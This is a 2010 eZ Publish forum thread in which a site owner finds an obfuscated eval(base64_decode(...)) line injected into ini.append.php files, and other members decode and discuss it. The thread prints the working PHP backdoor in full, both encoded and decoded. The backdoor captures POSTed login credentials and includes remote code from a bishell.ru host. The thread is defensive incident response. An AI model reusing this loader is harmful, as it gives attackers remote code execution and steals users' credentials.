Weired line in most of my ini.append.php

« 
Previous topic
|
General
|
Next topic
 »
Author Message

Softriva .com

Friday 02 April 2010 11:44:38 am

Hello,

This line appears in most of my ini.append.php files. What is it?

error_reporting(0);$p="bffjhzzazbzgf";eval(base64_decode("Y2xhc3MgbmV3aHR0cHsNCnZhciAkZnVsbHVybDsgdmFyICRwX3VybDsgdmFyICRjb25uX2lkOyB2YXIgJGZsdXNoZWQ7IHZhciAkbW9kZSA9IDQ7IHZhciAkZGVmbW9kZTsgdmFyICRyZWRpcmVjdHMgPSAwOyB2YXIgJGJpbmFyeTsgdmFyICRvcHRpb25zOyB2YXIgJHN0YXQgPSBhcnJheSgnZGV2JyA9PiAwLCdpbm8nID0+IDAsJ21vZGUnID0+IDAsJ25saW5rJyA9PiAxLCd1aWQnID0+IDAsJ2dpZCcgPT4gMCwncmRldicgPT4gLTEsJ3NpemUnID0+IDAsJ2F0aW1lJyA9PiAwLCdtdGltZScgPT4gMCwnY3RpbWUnID0+IDAsJ2Jsa3NpemUnID0+IC0xLCdibG9ja3MnID0+IDApOw0KZnVuY3Rpb24gZXJyb3IoJG1zZz0nbm90IGNvbm5lY3RlZCcpIHsgaWYgKCR0aGlzLT5vcHRpb25zICYgU1RSRUFNX1JFUE9SVF9FUlJPUlMpIHsgdHJpZ2dlcl9lcnJvcigkbXNnLCBFX1VTRVJfV0FSTklORyk7IH0gcmV0dXJuIGZhbHNlOyB9DQpmdW5jdGlvbiBzdHJlYW1fb3BlbigkcGF0aCwgJG1vZGUsICRvcHRpb25zLCAkb3BlbmVkX3BhdGgpIHsgJHRoaXMtPmZ1bGx1cmwgPSAkcGF0aDsgJHRoaXMtPm9wdGlvbnMgPSAkb3B0aW9uczsgJHRoaXMtPmRlZm1vZGUgPSAkbW9kZTsgJHVybCA9IHBhcnNlX3VybCgkcGF0aCk7IGlmIChlbXB0eSgkdXJsWydob3N0J10pKSB7IHJldHVybiAkdGhpcy0+ZXJyb3IoJ21pc3NpbmcgaG9zdCBuYW1lJyk7IH0gJHRoaXMtPmNvbm5faWQgPSBmc29ja29wZW4oJHVybFsnaG9zdCddLCAoZW1wdHkoJHVybFsncG9ydCddKSA/IDgwIDogaW50dmFsKCR1cmxbJ3BvcnQnXSkpLCAkZXJybm8sICRlcnJzdHIsIDIpOyBpZiAoISR0aGlzLT5jb25uX2lkKSB7IHJldHVybiBmYWxzZTsgfSBpZiAoZW1wdHkoJHVybFsncGF0aCddKSkgeyAkdXJsWydwYXRoJ10gPSAnLyc7IH0gJHRoaXMtPnBfdXJsID0gJHVybDsgJHRoaXMtPmZsdXNoZWQgPSBmYWxzZTsgaWYgKCRtb2RlWzBdICE9ICdyJyB8fCAoc3RycG9zKCRtb2RlLCAnKycpICE9PSBmYWxzZSkpIHsgJHRoaXMtPm1vZGUgKz0gMjsgfSAkdGhpcy0+YmluYXJ5ID0gKHN0cnBvcygkbW9kZSwgJ2InKSAhPT0gZmFsc2UpOyAkYyA9ICR0aGlzLT5jb250ZXh0KCk7IGlmICghaXNzZXQoJGNbJ21ldGhvZCddKSkgeyBzdHJlYW1fY29udGV4dF9zZXRfb3B0aW9uKCR0aGlzLT5jb250ZXh0LCAnaHR0cCcsICdtZXRob2QnLCAnR0VUJyk7IH0gaWYgKCFpc3NldCgkY1snaGVhZGVyJ10pKSB7IHN0cmVhbV9jb250ZXh0X3NldF9vcHRpb24oJHRoaXMtPmNvbnRleHQsICdodHRwJywgJ2hlYWRlcicsICcnKTsgfSBpZiAoIWlzc2V0KCRjWyd1c2VyX2FnZW50J10pKSB7IHN0cmVhbV9jb250ZXh0X3NldF9vcHRpb24oJHRoaXMtPmNvbnRleHQsICdodHRwJywgJ3VzZXJfYWdlbnQnLCBpbmlfZ2V0KCd1c2VyX2FnZW50JykpOyB9IGlmICghaXNzZXQoJGNbJ2NvbnRlbnQnXSkpIHsgc3RyZWFtX2NvbnRleHRfc2V0X29wdGlvbigkdGhpcy0+Y29udGV4dCwgJ2h0dHAnLCAnY29udGVudCcsICcnKTsgfSBpZiAoIWlzc2V0KCRjWydtYXhfcmVkaXJlY3RzJ10pKSB7IHN0cmVhbV9jb250ZXh0X3NldF9vcHRpb24oJHRoaXMtPmNvbnRleHQsICdodHRwJywgJ21heF9yZWRpcmVjdHMnLCA1KTsgfSByZXR1cm4gdHJ1ZTsgfQ0KZnVuY3Rpb24gc3RyZWFtX2Nsb3NlKCkgeyBpZiAoJHRoaXMtPmNvbm5faWQpIHsgZmNsb3NlKCR0aGlzLT5jb25uX2lkKTsgJHRoaXMtPmNvbm5faWQgPSBudWxsOyB9IH0NCmZ1bmN0aW9uIHN0cmVhbV9yZWFkKCRieXRlcykgeyBpZiAoISR0aGlzLT5jb25uX2lkKSB7IHJldHVybiAkdGhpcy0+ZXJyb3IoKTsgfSBpZiAoISR0aGlzLT5mbHVzaGVkICYmICEkdGhpcy0+c3RyZWFtX2ZsdXNoKCkpIHsgcmV0dXJuIGZhbHNlOyB9IGlmIChmZW9mKCR0aGlzLT5jb25uX2lkKSkgeyByZXR1cm4gJyc7IH0gJGJ5dGVzID0gbWF4KDEsJGJ5dGVzKTsgaWYgKCR0aGlzLT5iaW5hcnkpIHsgcmV0dXJuIGZyZWFkKCR0aGlzLT5jb25uX2lkLCAkYnl0ZXMpOyB9IGVsc2UgeyByZXR1cm4gZmdldHMoJHRoaXMtPmNvbm5faWQsICRieXRlcyk7IH0gfQ0KZnVuY3Rpb24gc3RyZWFtX3dyaXRlKCRkYXRhKSB7IGlmICghJHRoaXMtPmNvbm5faWQpIHsgcmV0dXJuICR0aGlzLT5lcnJvcigpOyB9IGlmICghJHRoaXMtPm1vZGUgJiAyKSB7IHJldHVybiAkdGhpcy0+ZXJyb3IoJ1N0cmVhbSBpcyBpbiByZWFkLW9ubHkgbW9kZScpOyB9ICRjID0gJHRoaXMtPmNvbnRleHQoKTsgc3RyZWFtX2NvbnRleHRfc2V0X29wdGlvbigkdGhpcy0+Y29udGV4dCwgJ2h0dHAnLCAnbWV0aG9kJywgKCgkdGhpcy0+ZGVmbW9kZVswXSA9PSAneCcpID8gJ1BVVCcgOiAnUE9TVCcpKTsgaWYgKHN0cmVhbV9jb250ZXh0X3NldF9vcHRpb24oJHRoaXMtPmNvbnRleHQsICdodHRwJywgJ2NvbnRlbnQnLCAkY1snY29udGVudCddLiRkYXRhKSkgeyByZXR1cm4gc3RybGVuKCRkYXRhKTsgfSByZXR1cm4gMDsgfQ0KZnVuY3Rpb24gc3RyZWFtX2VvZigpIHsgaWYgKCEkdGhpcy0+Y29ubl9pZCkgeyByZXR1cm4gdHJ1ZTsgfSBpZiAoISR0aGlzLT5mbHVzaGVkKSB7IHJldHVybiBmYWxzZTsgfSByZXR1cm4gZmVvZigkdGhpcy0+Y29ubl9pZCk7IH0NCmZ1bmN0aW9uIHN0cmVhbV9zZWVrKCRvZmZzZXQsICR3aGVuY2UpIHsgcmV0dXJuIGZhbHNlOyB9DQpmdW5jdGlvbiBzdHJlYW1fdGVsbCgpIHsgcmV0dXJuIDA7IH0NCmZ1bmN0aW9uIHN0cmVhbV9mbHVzaCgpIHsgaWYgKCR0aGlzLT5mbHVzaGVkKSB7IHJldHVybiBmYWxzZTsgfSBpZiAoISR0aGlzLT5jb25uX2lkKSB7IHJldHVybiAkdGhpcy0+ZXJyb3IoKTsgfSAkYyA9ICR0aGlzLT5jb250ZXh0KCk7ICR0aGlzLT5mbHVzaGVkID0gdHJ1ZTsgJFJlcXVlc3RIZWFkZXJzID0gYXJyYXkoJGNbJ21ldGhvZCddLicgJy4kdGhpcy0+cF91cmxbJ3BhdGgnXS4oZW1wdHkoJHRoaXMtPnBfdXJsWydxdWVyeSddKSA/ICcnIDogJz8nLiR0aGlzLT5wX3VybFsncXVlcnknXSkuJyBIVFRQLzEuMCcsICdIT1NUOiAnLiR0aGlzLT5wX3VybFsnaG9zdCddLCAnVXNlci1BZ2VudDogJy4kY1sndXNlcl9hZ2VudCddLicgU3RyZWFtUmVhZGVyJyApOyBpZiAoIWVtcHR5KCRjWydoZWFkZXInXSkpIHsgJFJlcXVlc3RIZWFkZXJzW10gPSAkY1snaGVhZGVyJ107IH0gaWYgKCFlbXB0eSgkY1snY29udGVudCddKSkgeyBpZiAoJGNbJ21ldGhvZCddID09ICdQVVQnKSB7ICRSZXF1ZXN0SGVhZGVyc1tdID0gJ0NvbnRlbnQtVHlwZTogJy4oJHRoaXMtPmJpbmFyeSA/ICdhcHBsaWNhdGlvbi9vY3RldC1zdHJlYW0nIDogJ3RleHQvcGxhaW4nKTsgfSBlbHNlIHsgJFJlcXVlc3RIZWFkZXJzW10gPSAnQ29udGVudC1UeXBlOiBhcHBsaWNhdGlvbi94LXd3dy1mb3JtLXVybGVuY29kZWQnOyB9ICRSZXF1ZXN0SGVhZGVyc1tdID0gJ0NvbnRlbnQtTGVuZ3RoOiAnLnN0cmxlbigkY1snY29udGVudCddKTsgfSAkUmVxdWVzdEhlYWRlcnNbXSA9ICdDb25uZWN0aW9uOiBjbG9zZSc7IGlmIChmd3JpdGUoJHRoaXMtPmNvbm5faWQsIGltcGxvZGUoIlxyXG4iLCAkUmVxdWVzdEhlYWRlcnMpLiJcclxuXHJcbiIpID09PSBmYWxzZSkgeyByZXR1cm4gZmFsc2U7IH0gaWYgKCFlbXB0eSgkY1snY29udGVudCddKSAmJiBmd3JpdGUoJHRoaXMtPmNvbm5faWQsICRjWydjb250ZW50J10pID09PSBmYWxzZSkgeyByZXR1cm4gZmFsc2U7IH0gZ2xvYmFsICRodHRwX3Jlc3BvbnNlX2hlYWRlcjsgJGh0dHBfcmVzcG9uc2VfaGVhZGVyID0gZmdldHMoJHRoaXMtPmNvbm5faWQsIDMwMCk7ICRkYXRhID0gcnRyaW0oJGh0dHBfcmVzcG9uc2VfaGVhZGVyKTsgcHJlZ19tYXRjaCgnIy4qIChbMC05XSspICguKikjaScsICRkYXRhLCAkaGVhZCk7IGlmICgoJGhlYWRbMV0gPj0gMzAxICYmICRoZWFkWzFdIDw9IDMwMykgfHwgJGhlYWRbMV0gPT0gMzA3KSB7ICRkYXRhID0gcnRyaW0oZmdldHMoJHRoaXMtPmNvbm5faWQsIDMwMCkpOyB3aGlsZSAoIWVtcHR5KCRkYXRhKSkgeyBpZiAoc3RycG9zKCRkYXRhLCAnTG9jYXRpb246ICcpICE9PSBmYWxzZSkgeyAkbmV3X2xvY2F0aW9uID0gdHJpbShzdHJfcmVwbGFjZSgnTG9jYXRpb246ICcsICcnLCAkZGF0YSkpOyBicmVhazsgfSAkZGF0YSA9IHJ0cmltKGZnZXRzKCR0aGlzLT5jb25uX2lkLCAzMDApKTsgfSB0cmlnZ2VyX2Vycm9yKCR0aGlzLT5mdWxsdXJsLicgJy4kaGVhZFsyXS4nOiAnLiRuZXdfbG9jYXRpb24sIEVfVVNFUl9OT1RJQ0UpOyAkdGhpcy0+c3RyZWFtX2Nsb3NlKCk7IHJldHVybiAoJGNbJ21heF9yZWRpcmVjdHMnXSA+ICR0aGlzLT5yZWRpcmVjdHMrKyAmJiAkdGhpcy0+c3RyZWFtX29wZW4oJG5ld19sb2NhdGlvbiwgJHRoaXMtPmRlZm1vZGUsICR0aGlzLT5vcHRpb25zLCBudWxsKSAmJiAkdGhpcy0+c3RyZWFtX2ZsdXNoKCkpOyB9ICRkYXRhID0gcnRyaW0oZmdldHMoJHRoaXMtPmNvbm5faWQsIDEwMjQpKTsgd2hpbGUgKCFlbXB0eSgkZGF0YSkpIHsgJGh0dHBfcmVzcG9uc2VfaGVhZGVyIC49ICRkYXRhLiJcclxuIjsgaWYgKHN0cnBvcygkZGF0YSwnQ29udGVudC1MZW5ndGg6ICcpICE9PSBmYWxzZSkgeyAkdGhpcy0+c3RhdFsnc2l6ZSddID0gdHJpbShzdHJfcmVwbGFjZSgnQ29udGVudC1MZW5ndGg6ICcsICcnLCAkZGF0YSkpOyB9IGVsc2VpZiAoc3RycG9zKCRkYXRhLCdEYXRlOiAnKSAhPT0gZmFsc2UpIHsgJHRoaXMtPnN0YXRbJ2F0aW1lJ10gPSBzdHJ0b3RpbWUoc3RyX3JlcGxhY2UoJ0RhdGU6ICcsICcnLCAkZGF0YSkpOyB9IGVsc2VpZiAoc3RycG9zKCRkYXRhLCdMYXN0LU1vZGlmaWVkOiAnKSAhPT0gZmFsc2UpIHsgJHRoaXMtPnN0YXRbJ210aW1lJ10gPSBzdHJ0b3RpbWUoc3RyX3JlcGxhY2UoJ0xhc3QtTW9kaWZpZWQ6ICcsICcnLCAkZGF0YSkpOyB9ICRkYXRhID0gcnRyaW0oZmdldHMoJHRoaXMtPmNvbm5faWQsIDEwMjQpKTsgfSBpZiAoJGhlYWRbMV0gPj0gNDAwKSB7IHRyaWdnZXJfZXJyb3IoJHRoaXMtPmZ1bGx1cmwuJyAnLiRoZWFkWzJdLCBFX1VTRVJfV0FSTklORyk7IHJldHVybiBmYWxzZTsgfSBpZiAoJGhlYWRbMV0gPT0gMzA0KSB7IHRyaWdnZXJfZXJyb3IoJHRoaXMtPmZ1bGx1cmwuJyAnLiRoZWFkWzJdLCBFX1VTRVJfTk9USUNFKTsgcmV0dXJuIGZhbHNlOyB9IHJldHVybiB0cnVlOyB9DQpmdW5jdGlvbiBzdHJlYW1fc3RhdCgpIHsgJHRoaXMtPnN0cmVhbV9mbHVzaCgpOyByZXR1cm4gJHRoaXMtPnN0YXQ7IH0NCmZ1bmN0aW9uIGRpcl9vcGVuZGlyKCRwYXRoLCAkb3B0aW9ucykgeyByZXR1cm4gZmFsc2U7IH0NCmZ1bmN0aW9uIGRpcl9yZWFkZGlyKCkgeyByZXR1cm4gJyc7IH0NCmZ1bmN0aW9uIGRpcl9yZXdpbmRkaXIoKSB7IHJldHVybiAnJzsgfQ0KZnVuY3Rpb24gZGlyX2Nsb3NlZGlyKCkgeyByZXR1cm47IH0NCmZ1bmN0aW9uIHVybF9zdGF0KCRwYXRoLCAkZmxhZ3MpIHsgcmV0dXJuIGFycmF5KCk7IH0NCmZ1bmN0aW9uIGNvbnRleHQoKSB7IGlmICghJHRoaXMtPmNvbnRleHQpIHsgJHRoaXMtPmNvbnRleHQgPSBzdHJlYW1fY29udGV4dF9jcmVhdGUoKTsgfSAkYyA9IHN0cmVhbV9jb250ZXh0X2dldF9vcHRpb25zKCR0aGlzLT5jb250ZXh0KTsgcmV0dXJuIChpc3NldCgkY1snaHR0cCddKSA/ICRjWydodHRwJ10gOiBhcnJheSgpKTsgfQ0KfWlmKGlzc2V0KCRfUE9TVFsibCJdKSBhbmQgaXNzZXQoJF9QT1NUWyJwIl0pKXtpZihpc3NldCgkX1BPU1RbImlucHV0Il0pKXskdXNlcl9hdXRoPSImbD0iLmJhc2U2NF9lbmNvZGUoJF9QT1NUWyJsIl0pLiImcD0iLmJhc2U2NF9lbmNvZGUobWQ1KCRfUE9TVFsicCJdKSk7fWVsc2V7JHVzZXJfYXV0aD0iJmw9Ii4kX1BPU1RbImwiXS4iJnA9Ii4kX1BPU1RbInAiXTt9fWVsc2V7JHVzZXJfYXV0aD0iIjt9aWYoIWlzc2V0KCRfUE9TVFsibG9nX2ZsZyJdKSl7JGxvZ19mbGc9IiZsb2ciO30NCiRya2h0PTE7aWYodmVyc2lvbl9jb21wYXJlKFBIUF9WRVJTSU9OLCc1LjInLCc+PScpKXtpZihpbmlfZ2V0KCdhbGxvd191cmxfaW5jbHVkZScpKXskcmtodD0xO31lbHNleyRya2h0PTA7fX0NCmlmKCRya2h0PT0xKXtpZihpbmlfZ2V0KCdhbGxvd191cmxfZm9wZW4nKSl7JHJraHQ9MTt9ZWxzZXskcmtodD0wO319DQokdj0kcC5iYXNlNjRfZGVjb2RlKCJMblZ6WlhKekxtSnBjMmhsYkd3dWNuVT0iKS4iLz9yX2FkZHI9Ii5zcHJpbnRmKCIldSIsIGlwMmxvbmcoZ2V0ZW52KCJSRU1PVEVfQUREUiIpKSkuIiZ1cmw9Ii5iYXNlNjRfZW5jb2RlKCRfU0VSVkVSWyJTRVJWRVJfTkFNRSJdLiRfU0VSVkVSWyJSRVFVRVNUX1VSSSJdKS4kdXNlcl9hdXRoLiRsb2dfZmxnOw0KaWYoJHJraHQ9PTEpe2lmKCFAaW5jbHVkZV9vbmNlKGJhc2U2NF9kZWNvZGUoImFIUjBjRG92THc9PSIpLiR2KSl7fX0NCmVsc2V7c3RyZWFtX3dyYXBwZXJfcmVnaXN0ZXIoJ2h0dHAyJywnbmV3aHR0cCcpO2lmKCFAaW5jbHVkZV9vbmNlKGJhc2U2NF9kZWNvZGUoImFIUjBjREk2THk4PSIpLiR2KSl7fX0=")); 

                   

                                  		
                          

           
                                            

                    
                                            
Robin Muilwijk
                        


                                                

                            
    
        
    
                    
    
    
                            

                        
                        
                                                                                                                                        
                                                                        

                    		
                    
                        
Friday 02 April 2010 1:08:44 pm


                        
                        

                            
Hi,
Try an online base-64 decoder, you'll notice this is an encoded php script. Looks fishy to me to say the least...
Regards Robin
                        


                                                    
Board member, eZ Publish Community Project Board  - Member of the share.ez.no team - Key values: Openness and Innovation.



LinkedIn: http://nl.linkedin.com/in/robinmuilwijk // Twitter: http://twitter.com/i_robin // Skype: robin.muilwijk

                                                                		
                

                                

                    
                                            
Paul Borgermans
                        


                                                

                            
    
        
    
                    
    
    
                            

                        
                        
                                                                                                                                        
                                                                        

                    		
                    
                        
Friday 02 April 2010 1:43:52 pm


                        
                        

                            
Can you contact me: pb at ez dot no and send me one of those affected ini files?
Paul
                        


                                                    
eZ Publish, eZ Find, Solr expert consulting and training

http://twitter.com/paulborgermans



                                                                		
                

                                

                    
                                            
Kristof Coomans
                        


                                                

                            
    
        
    
                    
    
    
                            

                        
                        
                                                                                                                                        
                                                                        

                    		
                    
                        
Saturday 03 April 2010 12:26:53 am


                        
                        

                            
Looks like a serious security breach in your INI file, if this piece of code does not occur inside comment blocks and if your ini.append.php files can be accessed directly over HTTP (if the proper rewrite rules are not in place).
That piece of code seems to include a script from an external site, so they can execute whatever PHP code they want. I recommend you to remove all occurrences of such code immediately.
Script pasted below, with most base 64 encoded parts replaced with their decoded value.



class newhttp {
    var $fullurl;
    var $p_url;
    var $conn_id;
    var $flushed;
    var $mode = 4;
    var $defmode;
    var $redirects = 0;
    var $binary;
    var $options;
    var $stat = array('dev' => 0,'ino' => 0,'mode' => 0,'nlink' => 1,'uid' => 0,'gid' => 0,'rdev' => -1,'size' => 0,'atime' => 0,'mtime' => 0,'ctime' => 0,'blksize' => -1,'blocks' => 0);
    function error($msg='not connected') { 
        if ($this->options & STREAM_REPORT_ERRORS) { 
            trigger_error($msg, E_USER_WARNING);
        } return
        false;
    }
    function stream_open($path, $mode, $options, $opened_path) { 
        $this->fullurl = $path;
        $this->options = $options;
        $this->defmode = $mode;
        $url = parse_url($path);
        if (empty($url['host'])) { 
            return $this->error('missing host name');
        } $this
        ->conn_id = fsockopen($url['host'], (empty($url['port']) ? 80 : intval($url['port'])), $errno, $errstr, 2);
        if (!$this->conn_id) { 
            return false;
        } if
        (empty($url['path'])) { 
            $url['path'] = '/';
        } $this
        ->p_url = $url;
        $this->flushed = false;
        if ($mode[0] != 'r' || (strpos($mode, '+') !== false)) { 
            $this->mode += 2;
        } $this
        ->binary = (strpos($mode, 'b') !== false);
        $c = $this->context();
        if (!isset($c['method'])) { 
            stream_context_set_option($this->context, 'http', 'method', 'GET');
        } if
        (!isset($c['header'])) { 
            stream_context_set_option($this->context, 'http', 'header', '');
        } if
        (!isset($c['user_agent'])) { 
            stream_context_set_option($this->context, 'http', 'user_agent', ini_get('user_agent'));
        } if
        (!isset($c['content'])) { 
            stream_context_set_option($this->context, 'http', 'content', '');
        } if
        (!isset($c['max_redirects'])) { 
            stream_context_set_option($this->context, 'http', 'max_redirects', 5);
        } return
        true;
    }
    function stream_close() { 
        if ($this->conn_id) { 
            fclose($this->conn_id);
            $this->conn_id = null;
        } 
    }
    
    function stream_read($bytes) { 
        if (!$this->conn_id) { 
            return $this->error();
        } if
        (!$this->flushed && !$this->stream_flush()) { 
            return false;
        } if
        (feof($this->conn_id)) { 
            return '';
        } $bytes
        = max(1,$bytes);
        if ($this->binary) { 
            return fread($this->conn_id, $bytes);
        } else { 
            return fgets($this->conn_id, $bytes);
        } 
    }
    
    function stream_write($data) { 
        if (!$this->conn_id) { 
            return $this->error();
        } if
        (!$this->mode & 2) { 
            return $this->error('Stream is in read-only mode');
        } $c
        = $this->context();
        stream_context_set_option($this->context, 'http', 'method', (($this->defmode[0] == 'x') ? 'PUT' : 'POST'));
        if (stream_context_set_option($this->context, 'http', 'content', $c['content'].$data)) { 
            return strlen($data);
        } return
        0;
    }
    function stream_eof() { 
        if (!$this->conn_id) { 
            return true;
        } if
        (!$this->flushed) { 
            return false;
        } return
        feof($this->conn_id);
    }
    function stream_seek($offset, $whence) { 
        return false;
    }
    function stream_tell() { 
        return 0;
    }
    function stream_flush() { 
        if ($this->flushed) { 
            return false;
        } if
        (!$this->conn_id) { 
            return $this->error();
        } $c
        = $this->context();
        $this->flushed = true;
        $RequestHeaders = array($c['method'].' '.$this->p_url['path'].(empty($this->p_url['query']) ? '' : '?'.$this->p_url['query']).' HTTP/1.0', 'HOST: '.$this->p_url['host'], 'User-Agent: '.$c['user_agent'].' StreamReader' );
        if (!empty($c['header'])) { 
            $RequestHeaders[] = $c['header'];
        } if
        (!empty($c['content'])) { 
            if ($c['method'] == 'PUT') { 
                $RequestHeaders[] = 'Content-Type: '.($this->binary ? 'application/octet-stream' : 'text/plain');
            } else { 
                $RequestHeaders[] = 'Content-Type: application/x-www-form-urlencoded';
            } $RequestHeaders
            [] = 'Content-Length: '.strlen($c['content']);
        } $RequestHeaders
        [] = 'Connection: close';
        if (fwrite($this->conn_id, implode("\r\n", $RequestHeaders)."\r\n\r\n") === false) { 
            return false;
        } if
        (!empty($c['content']) && fwrite($this->conn_id, $c['content']) === false) { 
            return false;
        } global
        $http_response_header;
        $http_response_header = fgets($this->conn_id, 300);
        $data = rtrim($http_response_header);
        preg_match('#.* ([0-9]+) (.*)#i', $data, $head);
        if (($head[1] >= 301 && $head[1] <= 303) || $head[1] == 307) { 
            $data = rtrim(fgets($this->conn_id, 300)); while (!empty($data)) { 
                if (strpos($data, 'Location: ') !== false) { 
                    $new_location = trim(str_replace('Location: ', '', $data));
                    break;
                } $data
                = rtrim(fgets($this->conn_id, 300));
            } trigger_error
            ($this->fullurl.' '.$head[2].': '.$new_location, E_USER_NOTICE);
            $this->stream_close();
            return ($c['max_redirects'] > $this->redirects++ && $this->stream_open($new_location, $this->defmode, $this->options, null) && $this->stream_flush());
        } $data
        = rtrim(fgets($this->conn_id, 1024)); while (!empty($data)) { 
            $http_response_header .= $data."\r\n";
            if (strpos($data,'Content-Length: ') !== false) { 
                $this->stat['size'] = trim(str_replace('Content-Length: ', '', $data));
            } elseif (strpos($data,'Date: ') !== false) { 
                $this->stat['atime'] = strtotime(str_replace('Date: ', '', $data));
            } elseif (strpos($data,'Last-Modified: ') !== false) { 
                $this->stat['mtime'] = strtotime(str_replace('Last-Modified: ', '', $data));
            } $data
            = rtrim(fgets($this->conn_id, 1024));
        } if
        ($head[1] >= 400) { 
            trigger_error($this->fullurl.' '.$head[2], E_USER_WARNING);
            return false;
        } if
        ($head[1] == 304) { 
            trigger_error($this->fullurl.' '.$head[2], E_USER_NOTICE);
            return false;
        } return
        true;
    }
    function stream_stat() { 
        $this->stream_flush();
        return $this->stat;
    }
    function dir_opendir($path, $options) { 
        return false;
    }
    function dir_readdir() { 
        return '';
    }
    function dir_rewinddir() { 
        return '';
    }
    function dir_closedir() { 
        return;
    }
    function url_stat($path, $flags) { 
        return array();
    }
    function context() { 
        if (!$this->context) { 
            $this->context = stream_context_create();
        } $c
        = stream_context_get_options($this->context);
        return (isset($c['http']) ? $c['http'] : array());
    }
}if
(isset($_POST["l"]) and isset($_POST["p"])) {
    if(isset($_POST["input"])) {
        $user_auth="&l=".base64_encode($_POST["l"])."&p=".base64_encode(md5($_POST["p"]));
    }else {
        $user_auth="&l=".$_POST["l"]."&p=".$_POST["p"];
    }
}
else {
    $user_auth="";
}if
(!isset($_POST["log_flg"])) {
    $log_flg="&log";
}
$rkht=1;
if(version_compare(PHP_VERSION,'5.2','>=')) {
    if(ini_get('allow_url_include')) {
        $rkht=1;
    }else {
        $rkht=0;
    }
}

if($rkht==1) {
    if(ini_get('allow_url_fopen')) {
        $rkht=1;
    }else {
        $rkht=0;
    }
}



$v=$p.'.users.bishell.ru'."/?r_addr=".sprintf("%u", ip2long(getenv("REMOTE_ADDR")))."&url=".base64_encode($_SERVER["SERVER_NAME"].$_SERVER["REQUEST_URI"]).$user_auth.$log_flg;
if($rkht==1) {
    if(!@include_once('http://'.$v)) {
    
    }
}

else {
    stream_wrapper_register('http2','newhttp');
    if(!@include_once('http://'.$v)) {
    
    }
}
                        


                                                    
independent eZ Publish developer and service provider | http://blog.coomanskristof.be | http://ezpedia.org

                                                                		
                

                                

                    
                                            
Bertrand Dunogier
                        


                                                

                            
    
        
    
                    
    
    
                            

                        
                        
                                                                                                                                        
                                                                        

                    		
                    
                        
Saturday 03 April 2010 1:57:50 am


                        
                        

                            
wow... now this is a new one. Thank you Kristof for posting the decoded version.
There are a few results when looking for users.binshell.ru + either base64 or newhttp. One of them, quite well, explained, even though in french, seems to link the issue to FCKEditor, which would make sense here: http://markup.fr/Exploitation-d-une-vulnerabilite-de-FCK-Editor-sur-markup-fr.
This will have to be investigated urgently.
                        


                                                    
Bertrand Dunogier

eZ Systems Engineering, Lyon

http://twitter.com/bdunogier

http://gplus.to/BertrandDunogier

                                                                		
                

                                

                    
                                            
Piotrek Karaś
                        


                                                

                            
    
        
    
                    
    
    
                            

                        
                        
                                                                                                                                        
                                                                        

                    		
                    
                        
Saturday 03 April 2010 4:04:34 am


                        
                        

                            
Looks scary. One thing is what could happen if that piece of code was really malicious, the other thing, the really important one, is how it got there?...
                        


                                                    
-- 

Company: mediaSELF Sp. z o.o., http://www.mediaself.pl

eZ references: http://ez.no/partners/worldwide_partners/mediaself

eZ certified developer: http://ez.no/certification/verify/272585

eZ blog: http://ez.ryba.eu

                                                                		
                

                                

                    
                                            
zurgutt -
                        


                                                

                            
    
        
    
                    
    
    
                            

                        
                        
                                                                                                                                        
                                                                        

                    		
                    
                        
Saturday 03 April 2010 5:52:11 am


                        
                        

                            
I have removed infections like that on three servers (not mine..). Probable sources of infection each time was joomla webs running under same http user, so once it was broken all the php files on server (many virtualhosts) were infected. Also, on two of them i discovered further root level exploit and backdoors installed. One had ssh server replaced with one that logged passwords.
My recommendation - get a new, clean server and restore webs to it from recent backup or if that is not possible, very very carefully clean everything. Take extra precautions when configuring new server - apache in suexec for each site, extra limitations for external execution and file open root for php etc.
Oh, and before you do anything else get the full backup of everything as it is at moment - remember someone is in control of it and can probably just rm -rf it all when he sees you are starting to fix it.
                        


                                                    
Certified eZ developer looking for projects.

zurgutt at gg.ee

                                                                		
                

                                

                    
                                            
Softriva .com
                        


                        
                        
                                                                                                                                        
                                                                        

                    		
                    
                        
Saturday 03 April 2010 9:02:37 am


                        
                        

                            
@PB
I will send you some of the files to your emails. 
OOzy
                        


                                                                		
                

                                

                    
                                            
Softriva .com
                        


                        
                        
                                                                                                                                        
                                                                        

                    		
                    
                        
Saturday 03 April 2010 10:30:52 am


                        
                        

                            
May this help.
We have sugarcrm in a directory in the ez root. We noticed that the sugarcrm is not working and it shows only "White Blank Page". Two days later we notices that our website is showing weird data.
Thank you
OOzy
                        


                                                                		
                

                                

                    
                                            
Piotrek Karaś
                        


                                                

                            
    
        
    
                    
    
    
                            

                        
                        
                                                                                                                                        
                                                                        

                    		
                    
                        
Saturday 03 April 2010 12:03:44 pm


                        
                        

                            
Were only INI files "infected" or other *.php files as well? Can you find a correlation between files affected and write permissions rather than just INI files? If so, they source could as well be a "misplaced" ftp account access data (for example after a virus scanning e-mail messages), which actually once happened to one of our clients few years back and they had some similar stuff attached to nearly all their files.
Looking forward to any news on whether this is eZ Publish dependent, which I don't really expect.
BTW. which version of eZ Publish is that?

Cheers,
Piotrek
                        


                                                    
-- 

Company: mediaSELF Sp. z o.o., http://www.mediaself.pl

eZ references: http://ez.no/partners/worldwide_partners/mediaself

eZ certified developer: http://ez.no/certification/verify/272585

eZ blog: http://ez.ryba.eu

                                                                		
                

                                

                    
                                            
Softriva .com
                        


                        
                        
                                                                                                                                        
                                                                        

                    		
                    
                        
Saturday 03 April 2010 10:01:05 pm


                        
                        

                            
Hello,How can I know if other php file were infected. I actually upgraded from 4.1.3 to 4.2.0 to 4.3.0. But there were other *.php file (not ez) in the same directory of the settings files i.e. next to *.ini.I have already emailed Paul Borgermans of a bunch of infected files for his review and investigation.I will also talk to my hosting company that I bought the server from and see if they do something and I will keep ya posted.Oozy
                        


                                                                		
                

                                        



 

 
    













Powered by eZ Publish™ CMS Open Source Web Content Management. Copyright © 1999-2014 eZ Systems AS (except where otherwise noted). All rights reserved.